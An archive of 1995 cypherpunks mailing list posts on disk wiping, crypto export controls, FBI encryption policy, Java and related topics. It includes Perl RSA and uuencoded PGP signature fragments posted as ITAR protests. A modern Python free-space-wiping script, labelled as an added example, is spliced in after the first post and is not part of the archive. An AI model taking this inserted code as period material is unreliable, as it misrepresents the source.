The attached file: "MAY.MSG" has been attached in HyperMIME format. It may
be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release
date 7-81).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:48:37 PDT
To: cypherpunks@toad.com
Subject: Re: mac share/freeware app for overwriting unused hd space?
Message-ID: <ac3dc7f7060210042380@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 PM 7/27/95, j. ercole wrote:
>Can anyone point me towards a program that's freeware or shareware that
>will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
>sincerely apologise if this is a faq.  I know norton's will do it but I
>don't presently have that installed on my machine.  Thanks oodles,

Well, getting the commercial products (fairly cheap, for Norton) is the
first line of defense if you're paranoid.

Erasing a file and then filling the disk with other files (even copies of
existing files) will do the same thing, albeit only once.

At the most serious level of attack (the "threat model"), such as the FBI
labs in Quantico or the NSA, there are reports that specialized disk drive
heads are used to recover earlier signals that are not erased even with N
active overwrite steps (apparently the head jitter in most drives means
that each write cycle is slightly different, even on the same disk region,
and a slight "shadow" or "ghost" of previous writes can sometimes be
extracted).

--Tim May, who hopes this will not reignite the thread about how to use
thermite to permanently erase disk drives

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."
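The fill-the-disk approach from the message above, as an added example that is not part of the original post or of any product it names: each pass writes a scratch file of random bytes until the volume reports it is full (or an optional cap is hit), flushes it, and deletes it. The function name and the `max_bytes` cap are assumptions of this sketch; it only reaches space the filesystem will hand to a new file, so slack inside existing files and reserved blocks are not touched.

```python
import errno
import os
import tempfile

# Errors meaning "volume or quota is full": the normal stop condition for a pass.
_FULL = {errno.ENOSPC, getattr(errno, "EDQUOT", errno.ENOSPC)}


def fill_free_space(directory, passes=1, chunk_size=1 << 20, max_bytes=None):
    """Overwrite unallocated space on the volume that holds `directory`.

    Each pass creates one scratch file, fills it with random data until the
    volume is full (or `max_bytes` is reached), syncs it, then removes it.
    Returns a list with the number of bytes written in each pass.
    """
    if passes < 1 or chunk_size < 1:
        raise ValueError("passes and chunk_size must be positive")

    written_per_pass = []
    for _ in range(passes):
        fd, path = tempfile.mkstemp(prefix="freespace-", suffix=".tmp",
                                    dir=directory)
        written = 0
        try:
            # Unbuffered, so a full disk is reported by the write that hits it.
            with os.fdopen(fd, "wb", buffering=0) as scratch:
                while max_bytes is None or written < max_bytes:
                    want = chunk_size
                    if max_bytes is not None:
                        want = min(chunk_size, max_bytes - written)
                    try:
                        done = scratch.write(os.urandom(want))
                    except OSError as exc:
                        if exc.errno in _FULL:
                            break
                        raise
                    if not done:
                        break
                    written += done
                try:
                    # Push the data to the device before the file is deleted.
                    os.fsync(scratch.fileno())
                except OSError as exc:
                    if exc.errno not in _FULL:
                        raise
        finally:
            # Always release the space, even if a pass failed part-way.
            os.unlink(path)
        written_per_pass.append(written)
    return written_per_pass


if __name__ == "__main__":
    # Constructed demo: a throwaway directory and a 256 KiB cap per pass,
    # so running this file never fills a real volume.
    with tempfile.TemporaryDirectory() as demo_dir:
        print(fill_free_space(demo_dir, passes=2, max_bytes=256 * 1024))
```

Calling it with `max_bytes=None` on a mounted volume performs the uncapped fill the message describes; other writers on that volume will see "disk full" errors while a pass is running.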






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 23:23:31 PDT
To: cypherpunks@toad.com
Subject: Java, Netscape, OpenDoc, and Babel
Message-ID: <ac3dcd76080210046dfa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been reading up on Java at the Web sites (such as
http://java.sun.com/1.0alpha3/doc/overview/java/index.html) and am awaiting
with bated breath the HotJava browser port for the Mac, to play with.

The "tower of Babel" is getting higher and higher, with Python, TCL,
Safe-TCL, Perl, and the various multimedia languages (Shockwave, Lingo,
ScriptX) all competing for attention.

I guess this is all to the good, and let the best languages and frameworks
prevail.

On a SmalltalkAgents list I am on (I own SmalltalkAgents, a powerful
implementation for the Mac, with a Windows version coming), one poster had
the following to say:

"I am hoping that OpenDoc and specifically CyberDog from Apple provide the
basis for a more rational and open Internet component environment. NetScape
is becoming a kitchen sink app and any solution they create for plug-in
components will set back things when an open industry standard for
components (OpenDoc) is about to be released."

NetScape a kitchen sink? Perhaps, but kitchen sinks have been selling
pretty well for years.

I just picked up a copy of "Pattern Languages of Program Design," edited by
James Coplien (of the well-regarded C++ book) and Douglas Schmidt. This
book has a series of interesting papers on the "design pattern" approach
(as in the book by Erich Gamma et al.).  The idea behind "pattern
languages," seen by some as the evolution of object-orientation, is to find
architectural abstractions, such as "iterators" and "constructors" which
encapsulate important behavioral features of a system.

The "applied ontology" in crypto seems to be a natural fit. Or so I think.
Maybe wishful thinking.

But in which framework or language, given the profusion of frameworks and
languages?

We had some TCL advocates a while back (Strick, Hal...)...any reaction to Java?

And so it goes.

--Tim May




..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net (John A. Limpert)
Date: Thu, 27 Jul 95 21:35:30 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507280433.AAA03234@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


>  "Officials said government police authorities have expressed concern
>that satellite telephone systems may enable people to conduct
>conversations that are out of the earshot of government investigators. 
>This would be particularly true in an area where, for example, there
>were no gateway through which government investigators could tap into
>calls. 

Is there a technical reason why communications through these future
satellite systems couldn't be encrypted? I thought that all of these
systems were based on vocoders and digital transmission, just like
a secure telephone.

If the future telecommunications infrastructure is digital end to
end, the carriers are going to be transporting streams of bits
at some predetermined rate, not analog voice. Whether the bits are
mu law encoded audio or PGP encrypted pictures of Senator Exon and
his favorite gerbil should be irrelevant to the network.

I wouldn't conduct a sensitive conversation over a wireless or
cellular phone system. Why would the prospective customers of
a satellite based system be satisfied with a system that allows
anyone with the proper equipment to secretly monitor their
conversations? I assume the market for this type of system is
going to be lawyers, business executives and others who are
willing to pay the high rates. Just the sort of people who should
be concerned about the confidentiality of their conversations.

--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 28 Jul 95 01:57:29 PDT
To: wolfgang@wi.WHU-Koblenz.de
Subject: Re: copyrighting algorithms
In-Reply-To: <199507280808.AA19581@ideath.goldenbear.com>
Message-ID: <199507280816.AA19640@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Wolfgang Roeckelein writes:
> No, I was referring to a case, where a third party game cartridges
> manufacturer reverse engineered the specifications of the game
> cartridges slot for producing his own cartridges for this game.

Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). 
I don't have it in front of me, but Terry Carroll's Copyright FAQ
(ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2)
cites it for the proposition that disassembly of a copyrighted work
can be fair use if there is no other way to reach noncopyrightable
(functional, not expressive) elements of an existing work. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBicgX3YhjZY3fMNAQFULwQAgvWmS1+p5BbN/C3wnVl21jqVjTL/tQIN
SMITIXhXTLaNmdGtlnPANC6brOYXb/17d2zHBwR0BcUWiH/AFjBsTLIxwroOx5np
kRSOk7dmw4jifrw4tMJw6Pe/pi7zs+IwT94ToEIKxcXRMs1lPruGdu2HM+kS+4ds
mCF+FKmP89E=
=UDoU
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 27 Jul 95 22:18:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Banks and Crypto
Message-ID: <v02130500ac3db15da2d0@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:03 7/27/95, Robert Hettinga wrote:
>At 11:29 PM 7/26/95, Robert A. Rosenberg wrote:
>>At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>>>See attached file: F:\OFFILES\KODMAIL.MSG
>
>>Is there ANY reason why you did not just paste the text of this file into
>>your message?
>
>Cluelessness? Carelessness? Some version of "-lessness", I'm sure...
>
>>Also, if you are going to attach files in lieu of writing
>>messages, it might be useful to mention what Wordprocessor was used to
>>create the file so it can be read. In this case, what format is your file
>>in?
>
>I just used a special feature on my Mac to deal with it. It's called a
>"trash can".
>
>Please remember that almost all such attachments, unless identified (even
>if identified, actually) usually get deleted.
>

I too am a Mac User. I usually pass files like this through MacLink+ first
since it can usually spot what flavor of PC Wordprocessor was used. In this
case, it was unable to accept it as any flavor of WordPerfect PC (which I
assume was the correct designation for the WP Office WP which I assume was
used since the MUA was shown in the Header as WP Office).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Thu, 27 Jul 95 23:41:29 PDT
To: cypherpunks@toad.com
Subject: Re: The Value of "Attachments" on this List
Message-ID: <199507280641.XAA14433@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


TCMay carefully encrypted on July 28th, 1995:
>See attached file: F:\MYFILES\MAY.MSG
>
>The attached file: "MAY.MSG" has been attached in HyperMIME format. It may
>be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release
>date 7-81).
>
Not having access to Electric Pencil 1.2, Sharpener 2.7.1 was able to 
"point to the correct keypoint", and Leadflow 1.6.5 traced the stream 
of bits to determine this vital message:

Have a nice day today!
And,
A nicer tomorrow!

Why thanks Tim!

Love Always,

Carol Anne
ps FV reports others had same problems. Yet 3 days have passed. 
   Shawmut bank only took 9 hours to fix the big 'double charge'
   problem they encountered last weekend.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Fri, 28 Jul 95 02:00:27 PDT
To: cypherpunks@toad.com
Subject: "Encryption" IRC script?
Message-ID: <199507280858.BAA18266@mail.direct.ca>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3931.1071713486.multipart/mixed"

--Boundary..3931.1071713486.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

C'punks..

I was just DCC'ed this rather cryptic IRCII script.  The author, nickname
george..

/whois george
311 George ~root original.netwest.com * :000-System Admin-000
312 George irc.escape.com :[198.6.71.13] Escape - New York City

(I highly doubt he's really the root there - no identd running?) claims that
it's an encryption routine in IRC.  I don't know how to read that script
language, and I'm most certainly not a crypto expert, so I've attached the
script in hopes that someone can tell me if this guy is a whacko and whatnot.

(Sorry for those not interested - the file was small, so I figured that not
too many people will mind.  It is ASCII with some nonprintables contained
within.)

I warn that I haven't tested the script, and as with all untrusted scripts,
DO NOT RUN IT until it's confirmed by someone that it's safe!


I-CODE.IRC


--
William Ono <wmono@direct.ca>                                     PGP 2902B621
 fingerprint = 51 6B BC 81 57 D8 FF 6A  5A A1 A4 6B 9A E3 E5 EE = fingerprint
PGP-encrypted mail welcome!                              Witty Quote Goes Here


--Boundary..3931.1071713486.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: ""
--Boundary..3931.1071713486.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Fri, 28 Jul 95 01:27:40 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <199507280834.DAA29882@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>  Just a quick note to chime in. The OSF just did a deal with Sun
>to port Java to several platforms. The OSF is opening a "web mall"
>where you can grab software objects and run them. 

Still tentative, or is there a Web address?

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 28 Jul 95 00:32:58 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <ac3dcd76080210046dfa@[205.199.118.202]>
Message-ID: <199507280729.DAA01649@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Just a quick note to chime in. The OSF just did a deal with Sun
to port Java to several platforms. The OSF is opening a "web mall"
where you can grab software objects and run them. Expect Java to
*really* take off in about 2-3 months. Every business on the net is going
to want a Java shopping-client-basket on their web-mall/web-store.
(Web Consultants! Learn Java!)

-Ray

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 28 Jul 95 03:14:23 PDT
To: wmono@Direct.CA
Subject: Re:  "Encryption" IRC script?
Message-ID: <199507281013.EAA16859@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Yes, there are scripts that implement DES encryption of IRC sessions,
using RSA to swap keys. (The encrypted lines always start with "clipper:"
on mine.) I don't think it's the same as the one you've got, but yes,
they are out there. (See what you miss when you can't find people on
the #crypto channel!?!)
 
The channel that was used to coordinate against a recent spam attack
of remailers turned into a rather interesting chat about several subjects.
(Including digicash) It was about two months worth of cpunks... (without
the normally-corresponding year's worth of alt.conspiracy reposts!!)
Maybe it would be fun to actually use the #crypto channel. (Unless there's
a #cpunk channel I don't know about?)
 
Don
 
Sorry I haven't been signing lately, but I've been replaced by a double.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 03:45:54 PDT
To: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Subject: Re: NSA and the NCSA/Apache web servers
In-Reply-To: <9507280320.AA28749@paganini.sydney.sterling.com>
Message-ID: <9507281039.AA13694@all.net>
MIME-Version: 1.0
Content-Type: text


> 
>   
> "Amir Y. Rosenblatt" <axon@neuron.net> wrote:
>   Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.
> 
> A few years ago I asked Matt Blaze if he would
> publish CFS with the cryptography removed, and he
> told me that AT&T's lawyers also believed this to
> be true. (So, of course, his answer was "No".)
> The hooks are as important as the crypto code.
> 
> Interestingly though, Kerberos made it to
> Australia (Bond University I think) legally.

Actually, neither hooks nor encryption are unexportable, you just need
a license to export them.  I got a license to export an RSA encryption
scheme and a general purpose hook into encryption for integrity toolkit.
It took a few months and was not very difficult, but you have to apply.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 28 Jul 95 05:43:43 PDT
To: cypherpunks@toad.com
Subject: NYT on SuperGrassley
Message-ID: <199507281243.IAA01247@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, July 28, 1995, p. A26.


   [Editorial] Senator Grassley's Surf Police


   An academic study suggesting that the Internet is awash in
   bestiality, pedophilia and other kinky sex turns out to
   have been seriously flawed. Politicians like Senator
   Charles Grassley who waved the study around as an argument
   for intrusive regulation have stopped doing so. But Mr.
   Grassley and his allies have not backed off from their
   drive to draft unnecessary legislative restrictions on
   computer communications. Earlier this summer, Senator James
   Exon attached an amendment to the Senate version of a
   telecommunications bill that would impose Federal penalties
   on those who made available material deemed unsuitable for
   children.

   The unreliable study that did much to spur this bad
   legislating was conducted by Marty Rimm, then an
   undergraduate at Carnegie-Mellon University. It was
   reprinted in the Georgetown Law Journal and served as the
   basis for a credulous Time magazine article early this
   month. Mr. Rimm's academic supervisors have since made
   clear that the study had serious defects. The likelihood
   that children will be accidentally deluged with sexually
   charged computer graphics is much smaller than Mr. Rimm and
   his promoters suggested.

   Furthermore, to the extent that any problem exists, the
   best response is not through heavyhanded, constitutionally
   dubious legislation but parental education and
   discretionary user controls.

   Mr. Rimm's study looked at the computer habits of adults.
   He focused not on generally accessible areas of the
   Internet but on separate, commercial adult bulletin board
   services that require special procedures to find and use.
   This, critics note, is like visiting an adult bookstore and
   using the percentage of gamey titles to generalize about
   the contents of all bookstores. He also looked, less
   carefully, at specialized areas of the Internet that would
   be hard to stumble upon by accident.

   By Mr. Rimm's own calculations, less than 1 percent of all
   material on the Internet itself is raunchy, although this
   tiny percentage is unusually popular among the adults he
   surveyed. Another Carnegie-Mellon study, focusing on
   families with high school children, suggests that sexually
   explicit material is much less popular among these users.

   To be sure, sexually explicit material that would be
   offensive to some users can be found on the Internet. It is
   within the reach of computer-literate children using the
   networks without parental supervision.

   But the problem is being exaggerated to create a pretext
   for restricting the material available to adult users of
   computers. Some members of Congress, out of political greed
   or ignorance, want to censor what can be put on the Net and
   prosecute those who post legal but raunchy material. The
   approaches being advocated by Mr. Exon and Mr. Grassley are
   unwarranted and unconstitutional.

   They are also impractical. Material posted to the Internet
   in foreign countries, beyond the reach of American law, is
   as available to users as domestically posted material.
   Items can also be posted through anonymous mailers that
   make it impossible to identify the original source.
   Censorship would also have the unwelcome effect of
   restricting adults to reading and viewing material deemed
   suitable for children, and would stunt the future of the
   networks as a medium for artistic expression.

   Parents who want to restrict what their children are able
   to call up on their computers can avail themselves of
   software now available on the market that can block out
   unwanted material. Filtering out such material at the user
   end is a more practical, and far less objectionable,
   approach than limiting a nation of computer users to baby
   talk.

   Such devices are not foolproof, of course. The surest
   defense is for parents to try to teach their children the
   kind of healthy values that would make them uninterested
   in, or immune to, sexually exploitative material.

   [End]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Smith <chris@deltacom.mindspring.com>
Date: Fri, 28 Jul 95 06:45:08 PDT
To: cypherpunks@toad.com
Subject: Quicken's new version
Message-ID: <Pine.LNX.3.91.950728084231.1957A-100000@deltacom.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


If I am out of place for posting here, forgive me; however, I do believe 
this germane.  Compass Bank here in Alabama is joining twenty other banks 
around the country to offer dial-in banking via Quicken's new software 
release.  Does anyone know of, or has anyone heard of, the security mechanisms
which are to be built in to this product, specifically authentication and
encryption?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 28 Jul 95 06:08:21 PDT
To: meredith@ecid.cig.mot.com (Andrew D Meredith)
Subject: Re: Hooks to Crypto>
In-Reply-To: <9507281237.ZM15500@jurua.sweng.ecid.cig.mot.com>
Message-ID: <9507281300.AA22773@all.net>
MIME-Version: 1.0
Content-Type: text


...
> > Actually, neither hooks nor encryption are unexportable, you
> > just need a license to export them.
...

> I hope I'm not alone in wondering why on earth this is the case.

They don't want to encourage encryption if they can avoid it.  It
impairs their ability to gather intelligence.

> Ok, exporting cryptography from the USA is restricted, and highly
> controversial. I think there has been something on this one already.
>
> But what is it, in the legal wibble, that makes _hooks_ to
> cryptography restricted? How have they worded things to make this the
> case?

Legal? What makes you think so? It hasn't made it to the courts yet
because people in the US aren't willing to risk jail over their
right to do it.  The only court case I am aware of was the RSA case and
in that one, the courts ruled against the NSA - but in today's political
and economic environment, people who do cryptography don't want to risk
it.

> The hooks are of course completely useless in and of themselves. You
> can only do anything useful with them if you have the matching crypto
> package.

Not really right.  It's very easy to change a compression hook into an
encryption hook using standard off-the-shelf shareware, public domain
software, or commercial products.

> Yours a confused Brit ... who doesn't have this problem ... yet!!

Don't bet on it.  If you really try to export top-flight encryption
technology in a big way, you may find that your government can be
just as oppressive as mine.

-- 
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Fri, 28 Jul 95 00:17:39 PDT
To: Bill Trost <trost@cloud.rain.com>
Subject: Re: copyrighting algorithms
Message-ID: <9507280717.AA07537@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

From: Bill Trost <trost@cloud.rain.com>
>
>Wolfgang Roeckelein writes:
>    >I wasn't aware that you could copyright an algorithm.  Patent,
>    >yes, but not copyright.  Intellectual property means secret,
>    >right?  Aren't there any precedence cases involving proprietary
>    >schemes that are reverse engineered?
>
>    Game cartridges (I think sega was involved)
>
>You might be referring to Nintendo vs. Galoob, which was used as a
>sample case in a January 1994 article in the Communications of the
>ACM titled "Copyright's Fair use Doctrine and Digital Data".  The
>article states

No, I was referring to a case where a third-party game cartridge manufacturer
reverse engineered the specifications of the game cartridge slot to produce
his own cartridges for this game.

Unfortunately, I have lost the reference and the names of the companies, but
this is the main case cited when it comes to reverse engineering proprietary
schemes. Maybe I can dig this out, or another member of the list has details
available.

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan pugh <alan.pugh@internetmci.com>
Date: Fri, 28 Jul 95 07:02:25 PDT
To: cypherpunks@toad.com
Subject: http://www2.pcy.mci.net/whats-new/editors/meeks/index.html
Message-ID: <01HTEDK5W95U8WWCLS@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


mostly old news for the readers here, but relevant to the list.
this was found at the net editors off of mci's webpage.

> 
> The Assault on Private Encryption
> 
> by Brock N. Meeks
> 
> Washington, DC -- The other shoe has dropped now, several times.
> 
> The political backlash and emotional fallout of the bombing of the
> federal building in Oklahoma City still lingers here. FBI Director
> Louis Freeh is using that event as a lever to wage a kind of private
> war against the use of private encryption schemes.
> 
> According to Administration sources, several different proposals are
> now being discussed on how the government might go about implementing
> a policy of government mandated, government "certified" encryption.
> The most hardline of these proposals would outlaw your ability to
> choose an encryption scheme which the government couldn't break, under
> the authority of a court order.
> 
> Freeh has left no doubts that his next target -- after successfully
> getting Congress to pass the $500 million Digital Telephony Bill,
> which gives law enforcement agencies an "easy access" method of
> eavesdropping on telephone conversations -- is private encryption.
> 
> During an appropriations hearing in May, Freeh told a congressional
> panel: "[W]e're in favor of strong encryption, robust encryption. The
> country needs it, industry needs it. We just want to make sure we have
> a trap door and key under some judge's authority where we can get
> there if somebody is planning a crime."
> 
> That means an end to any non-government approved encryption technology
> that doesn't have some means of providing the Feds with its treasured
> "back door." Under this scheme, for example, the widely-used Pretty
> Good Privacy (PGP) encryption program would be, essentially, illegal
> to own or at least, illegal for a U.S. citizen to use inside U.S.
> borders.
> 
> Private encryption schemes allow a person to scramble an electronic
> message so that, if intercepted by an unintended party, it is rendered
> unreadable. These scrambling programs are useful to a wide range of
> people and interests, including researchers that want to keep their
> proprietary breakthroughs safe from prying eyes to corporations
> sending trade secrets to a distant office across the Net to ordinary
> folks sending a steamy love letter to a lover.
> 
> But these same encryption programs are being used by "terrorists and
> international drug traffickers," as well, claims FBI Director Freeh,
> and that makes private encryption schemes a threat to national
> security.
> 
> Freeh's crusade against encryption is being backed by the
> Justice Department, with the gleeful back alley goading of the
> nation's top spook group, the National Security Agency.
> 
> To meet the "challenges of terrorism," Freeh said, several things must
> be done, among them, deal with "encryption capabilities available to
> criminals and terrorists" because such technology endangers "the
> future usefulness of court-authorized wiretaps. This problem must be
> resolved."
> 
> While Freeh has used the Oklahoma City bombing as convenient "news
> hook" to again make a pitch to "resolve" the private encryption
> "problem," the Director was basically reading from a dog-eared script.
> Within the last several months he has repeatedly testified publicly
> before Congress about the "evils" of encryption.
> 
> On March 30, before the House Judiciary Committee's Subcommittee on
> Crime, he said:
> 
> "Even though access is all but assured [by the passage of the Digital
> Wiretap Act] an even more difficult problem with court-authorized
> wiretaps looms. Powerful encryption is becoming commonplace. The drug
> cartels are buying sophisticated communications equipment.... This, as
> much as any issue, jeopardizes the public safety and national security
> of this country. Drug cartels, terrorists, and kidnappers will use
> telephones and other communications media with impunity knowing that
> their conversations are immune from our most valued investigative
> technique."
> 
> Then during a May 3 appearance before the same Committee, Freeh said:
> "Encryption capabilities available to criminals and terrorists, both
> now and in days to come, must be dealt with promptly. We will not have
> an effective counterterrorism strategy if we do not solve the problem
> of encryption."
> 
> But there's nothing to be alarmed at here, according to Freeh. Just
> because he's asking the Congress and the White House to strip you of
> the right to choose how you scramble your messages, using a program
> that the government doesn't hold all the keys to, doesn't mean that
> the Director isn't a sensitive guy or that he has suddenly taken a
> liking to wearing jackboots.
> 
> Freeh steadfastly maintains all these new powers he's asking for are
> simply "tools" and "not new authorities." These new powers are "well
> within the Constitution," Freeh told Congress.
> 
> Freeh hasn't publicly outlined just how he proposes to "resolve" the
> "encryption problem." However, according to an FBI source, several
> plans are in the works. The source refused to detail any specific
> plan, but added: "Let's just say everything is on the table." Does
> that include outlawing private encryption schemes? "I said
> 'everything,'" the source said.
> 
> The encryption debate has been raging for years. Two years ago the
> Clinton Administration unveiled a new policy in which it proposed to
> flood the market with its own home-grown encryption devices -- a
> product of the National Security Agency -- called the "Clipper Chip."
> 
> The Clipper is based on a "key-escrow" system. Two government agencies
> would hold the keys "in escrow", which are unique to each chip, in a
> kind of "data vault." Any time the FBI-- or your local sheriff --
> wanted to tap your phone conversations, they would have to ask a judge
> to order the two government agencies to turn over the keys to your
> Clipper chip. With those keys, the FBI could then unscramble any of
> your conversations at will.
> 
> That policy raised a huge firestorm of controversy and the Clipper
> sunk from sight, down, but not out. The intent of the White House,
> acting as a front man for the NSA and other intelligence agencies
> along with the FBI, was to have Americans adopt Clipper voluntarily



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 28 Jul 95 06:43:59 PDT
To: Ray Arachelian <perry@imsi.com
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <9507271447.AA12988@snark.imsi.com>
Message-ID: <0k6CY5SMc50e9Dw4U4@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 27-Jul-95 Re: "Only on the Cypherpunk.. "Perry E.
Metzger"@imsi. (292)

> NetBSD, not FreeBSD. There is also MachTen.

Yes, I can attest to the fact that MachTen is *amazing*, particularly
its seamless integration of the Mac and UNIX file systems.  It's worth
getting it even if the only thing you ever use it for is to do "find"
and "grep" through your Macintosh files.....
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
